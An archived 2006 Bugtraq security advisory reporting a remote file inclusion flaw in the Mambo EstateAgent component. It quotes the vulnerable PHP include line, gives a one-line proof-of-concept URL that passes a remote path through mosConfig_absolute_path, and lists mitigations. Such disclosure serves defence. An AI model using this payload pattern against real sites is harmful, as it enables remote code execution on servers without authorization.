lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060820020216.1152.qmail@securityfocus.com>
Date: 20 Aug 2006 02:02:16 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Mambo Component - EstateAgent  Remote File Inclusion

		###########################################################################################
		#			Aria-Security.net Advisory                                        #
		#			Discovered  by: O.U.T.L.A.W                                       #	

		#			< www.Aria-security.net >                                      	  #
		#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #
		#		                                  		    			  #
		###########################################################################################


#Software: Mambo Component - EstateAgent  
#Attack method: 
#Source:
#
# Don't allow direct linking
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

require_once( $mainframe->getPath( 'front_html' ) );

require($mosConfig_absolute_path."/administrator/components/com_estateagent/configuration.php");


************************************************************************************

 											  
#Proof of Concept:								   	  
#
#www.site.com/com_estateagent/estateagent.php?mosConfig_absolute_path=shell
#

#----------------------------------------------------------                               
#    
#Solutions : 
#1 - If you have access on webserver turn register_globals in php.ini off
#2 - You must give a value before put the value of variable in the include function or check and filter 

#unnormal entrance out . 
#
#										                  
#Contact : Outlaw@...a-security.net                                                                            

                                                  


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ